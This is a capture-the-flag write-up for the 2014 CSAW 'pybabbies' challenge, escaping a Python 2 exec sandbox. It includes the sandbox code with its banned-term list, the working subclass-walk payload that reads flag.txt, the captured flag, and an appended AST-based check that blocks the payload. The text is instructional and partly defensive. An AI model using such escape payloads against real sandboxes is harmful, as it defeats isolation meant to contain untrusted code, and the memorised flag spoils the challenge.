2014 CSAW CTF Qual - Exploitation 200 - pybabbies

  1. given the source code of a Python sandbox, pyshell.py; need to find the key
  2. inspecting it reveals that every builtin has been deleted from __builtins__ except raw_input and print; in addition, a blacklist of substrings is applied to the input, and since "sys" is banned, "system" cannot be used either; matches are case-insensitive
  3. if all these checks pass, the input command string is exec'ed
  4. refactored the given pyshell.py (Python 2) to facilitate local testing by replacing the raw_input loop with a fixed list of statements
  5. #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # Python 2: relies on the `file` builtin type and on `exec` as a statement.

    from __future__ import print_function

    print("Welcome to my Python sandbox! Enter commands below!")
    # substrings rejected from the input, matched case-insensitively
    banned = ["import", "exec", "eval", "pickle", "os", "subprocess",
              "kevin sucks", "input", "banned", "cry sum more", "sys"]
    # strip every builtin except raw_input and print
    targets = __builtins__.__dict__.keys()
    targets.remove("raw_input")
    targets.remove("print")
    for x in targets:
        del __builtins__.__dict__[x]
    # statements to test locally in place of the original raw_input loop
    stmts = [
        "print({}.__class__.__bases__[0].__subclasses__()[40]('./flag.txt').read())"
    ]
    for i, data in enumerate(stmts):
        for no in banned:
            if no.lower() in data.lower():
                print("offending term:", no)
                break
        else:
            # no banned term found: the sandbox exec's the string as-is
            print(i, ":", data)
            exec data
    
  6. {}.__class__... could instead be ().__class__..., reaching object via the base class of tuple instead of dict; index 40 of the resulting __subclasses__() list is the Python 2 file type, which needs no builtin name to reach;
    so the overall command is just reading the contents of a file
  7. guessed rightly that filename is flag.txt; otherwise would have tried key.txt
  8. flag{definitely_not_intro_python}
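Added example (not part of the original writeup or challenge code): the sandbox's substring blacklist, reconstructed from step 2, beside a hypothetical AST-based check that rejects any double-underscore attribute or name; the writeup's payload passes the first and is stopped by the second. Function names and the AST check are assumptions, and rejecting dunder access closes only this path, it does not make exec of untrusted input safe.

```python
import ast

# blacklist from the challenge source
BANNED = ["import", "exec", "eval", "pickle", "os", "subprocess",
          "kevin sucks", "input", "banned", "cry sum more", "sys"]

# the writeup's payload (Python 2 index 40 == file)
PAYLOAD = ("print({}.__class__.__bases__[0].__subclasses__()[40]"
           "('./flag.txt').read())")


def substring_filter(cmd, banned=BANNED):
    """The sandbox's own check: case-insensitive substring match.
    Returns the first offending term, or None if cmd would be exec'ed."""
    lowered = cmd.lower()
    for term in banned:
        if term.lower() in lowered:
            return term
    return None


def rejected_dunders(cmd):
    """Hypothetical hardening: parse cmd and collect every attribute or
    name starting with '__', the hook used to climb from {} to file.
    Returns a sorted list; an empty list means nothing was flagged.
    Unparseable input raises SyntaxError, and would not exec anyway."""
    tree = ast.parse(cmd, mode="exec")
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            found.add(node.attr)
        elif isinstance(node, ast.Name) and node.id.startswith("__"):
            found.add(node.id)
    return sorted(found)


if __name__ == "__main__":
    # None: the payload contains no banned substring
    print("blacklist:", substring_filter(PAYLOAD))
    # ['__bases__', '__class__', '__subclasses__']: the AST check flags it
    print("ast check:", rejected_dunders(PAYLOAD))
```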